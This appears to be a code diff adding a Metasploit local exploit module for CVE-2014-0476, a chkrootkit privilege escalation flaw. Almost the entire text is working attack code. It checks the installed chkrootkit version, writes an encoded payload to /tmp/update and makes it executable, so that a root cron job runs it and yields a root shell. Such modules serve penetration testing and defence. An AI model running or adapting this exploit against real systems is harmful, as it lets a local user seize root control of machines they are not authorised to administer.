|
| 1 | +## |
| 2 | +# This module requires Metasploit: http://metasploit.com/download |
| 3 | +# Current source: https://github.com/rapid7/metasploit-framework |
| 4 | +## |
| 5 | + |
| 6 | +class Metasploit4 < Msf::Exploit::Local |
| 7 | + |
| 8 | + # This could also be Excellent, but since it requires |
| 9 | + # up to one day to pop a shell, let's set it to Manual instead. |
| 10 | + Rank = ManualRanking |
| 11 | + |
| 12 | + include Msf::Post::File |
| 13 | + include Msf::Exploit::FileDropper |
| 14 | + |
| 15 | + def initialize(info = {}) |
| 16 | + super(update_info(info, |
| 17 | + 'Name' => 'Chkrootkit Local Privilege Escalation', |
| 18 | + 'Description' => %q{ |
| 19 | + Chkrootkit before 0.50 will run any executable file named |
| 20 | + /tmp/update as root, allowing a trivial privsec. |
| 21 | +
|
| 22 | + WfsDelay is set to 24h, since this is how often a chkrootkit |
| 23 | + scan is scheduled by default. |
| 24 | + }, |
| 25 | + 'Author' => [ |
| 26 | + 'Thomas Stangner', # Original exploit |
| 27 | + 'Julien "jvoisin" Voisin' # Metasploit module |
| 28 | + ], |
| 29 | + 'References' => [ |
| 30 | + ['CVE', '2014-0476'], |
| 31 | + ['OSVDB', '107710'], |
| 32 | + ['EDB', '33899'], |
| 33 | + ['BID', '67813'], |
| 34 | + ['CWE', '20'], |
| 35 | + ['URL', 'http://seclists.org/oss-sec/2014/q2/430'] |
| 36 | + ], |
| 37 | + 'DisclosureDate' => 'Jun 04 2014', |
| 38 | + 'License' => MSF_LICENSE, |
| 39 | + 'Platform' => 'unix', |
| 40 | + 'Arch' => ARCH_CMD, |
| 41 | + 'SessionTypes' => ['shell', 'meterpreter'], |
| 42 | + 'Privileged' => true, |
| 43 | + 'Stance' => Msf::Exploit::Stance::Passive, |
| 44 | + 'Targets' => [['Automatic', {}]], |
| 45 | + 'DefaultTarget' => 0, |
| 46 | + 'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h |
| 47 | + )) |
| 48 | + |
| 49 | + register_options([ |
| 50 | + OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit']) |
| 51 | + ]) |
| 52 | + end |
| 53 | + |
| 54 | + def check |
| 55 | + version = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1") |
| 56 | + |
| 57 | + if version =~ /chkrootkit version 0\.[1-4]/ |
| 58 | + Exploit::CheckCode::Appears |
| 59 | + else |
| 60 | + Exploit::CheckCode::Safe |
| 61 | + end |
| 62 | + end |
| 63 | + |
| 64 | + def exploit |
| 65 | + print_warning('Rooting depends on the crontab (this could take a while)') |
| 66 | + |
| 67 | + write_file('/tmp/update', "#!/bin/sh\n(#{payload.encoded}) &\n") |
| 68 | + cmd_exec('chmod +x /tmp/update') |
| 69 | + register_file_for_cleanup('/tmp/update') |
| 70 | + |
| 71 | + print_status('Payload written to /tmp/update') |
| 72 | + print_status('Waiting for chkrootkit to run via cron...') |
| 73 | + end |
| 74 | + |
| 75 | +end |
0 commit comments